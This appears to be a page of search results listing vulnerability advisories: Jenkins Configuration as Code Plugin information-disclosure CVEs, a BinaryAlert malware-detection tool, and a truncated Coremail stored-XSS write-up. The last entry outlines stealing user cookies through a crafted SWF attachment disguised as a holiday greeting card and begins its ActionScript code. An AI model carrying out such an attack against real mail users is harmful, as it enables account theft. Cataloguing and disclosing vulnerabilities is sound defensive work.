115 matches found
CloudBees Jenkins Configuration as Code Plugin Information Disclosure Vulnerability (CNVD-2019-42749)
CloudBees Jenkins Hudson Labs is a set of Java-based continuous integration tools developed by the US company CloudBees. The product is mainly used to monitor continuous software release/testing projects and some scheduled tasks. Configuration as Code Plugin is used in which a Jenki...
PT-2019-11758 · Jenkins · Jenkins Configuration As Code Plugin +1
Name of the Vulnerable Software and Affected Versions: Jenkins Configuration as Code Plugin versions 1.24 and earlier Description: The issue allows attackers with permission to change Jenkins system configuration to obtain the values of environment variables due to variable interpolation during...
CloudBees Jenkins Configuration as Code Plugin Information Disclosure Vulnerability
CloudBees Jenkins, formerly known as Hudson Labs, is a set of Java-based continuous integration tools developed by the US company CloudBees. It is mainly used to monitor continuous software release/testing projects and some scheduled tasks...
Design/Logic Flaw
An exposure of sensitive information vulnerability exists in Jenkins Configuration as Code Plugin 0.7-alpha and earlier in DataBoundConfigurator.java, Attribute.java, BaseConfigurator.java, and ExtensionConfigurator.java that allows attackers with access to Jenkins log files to obtain the passwords...
Design/Logic Flaw
An exposure of sensitive information vulnerability exists in Jenkins Configuration as Code Plugin 0.7-alpha and earlier in ConfigurationAsCode.java that allows attackers with Overall/Read access to obtain the YAML export of the Jenkins configuration...
CVE-2018-1000610
An exposure of sensitive information vulnerability exists in Jenkins Configuration as Code Plugin 0.7-alpha and earlier in DataBoundConfigurator.java, Attribute.java, BaseConfigurator.java, and ExtensionConfigurator.java that allows attackers with access to Jenkins log files to obtain the passwords...
CVE-2018-1000609
An exposure of sensitive information vulnerability exists in Jenkins Configuration as Code Plugin 0.7-alpha and earlier in ConfigurationAsCode.java that allows attackers with Overall/Read access to obtain the YAML export of the Jenkins configuration...
CVE-2018-1000610
The CVE-2018-1000610 entry concerns the Jenkins Configuration as Code Plugin (0.7-alpha and earlier). The vulnerability arises from insecure handling of passwords configured via the plugin, specifically in DataBoundConfigurator.java, Attribute.java, BaseConfigurator.java, and ExtensionConfigurato...
CVE-2018-1000609
The CVE-2018-1000609 issue affects Jenkins Configuration as Code Plugin (0.7-alpha and earlier). The vulnerability arises from ConfigurationAsCode.java, allowing users with Overall/Read access to export the Jenkins YAML configuration, exposing sensitive information. Impact is exposure of configur...
BinaryAlert - Serverless, Real-time & Retroactive Malware Detection
BinaryAlert is an open-source serverless AWS pipeline where any file uploaded to an S3 bucket is immediately scanned with a configurable set of YARA rules. An alert will fire as soon as any match is found, giving an incident response team the ability to quickly contain the threat before it spread...
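Coremail Mail System Stored XSS, Part 2
Brief description: A design flaw allows malicious JavaScript code to be executed and user cookies to be stolen. Details: Send a specially crafted swf file to the victim as an attachment (you could choose to do this around a holiday, for example renaming the file to 新年贺卡.swf, "New Year greeting card"): The AS code of the swf file is as follows (bear with it, it was cobbled together from various pieces): package import flash.external.ExternalInterface; import flash.display.Sprite; import flash.display.Sprite; import flash.events.Event; import flash.net.URLLoader;...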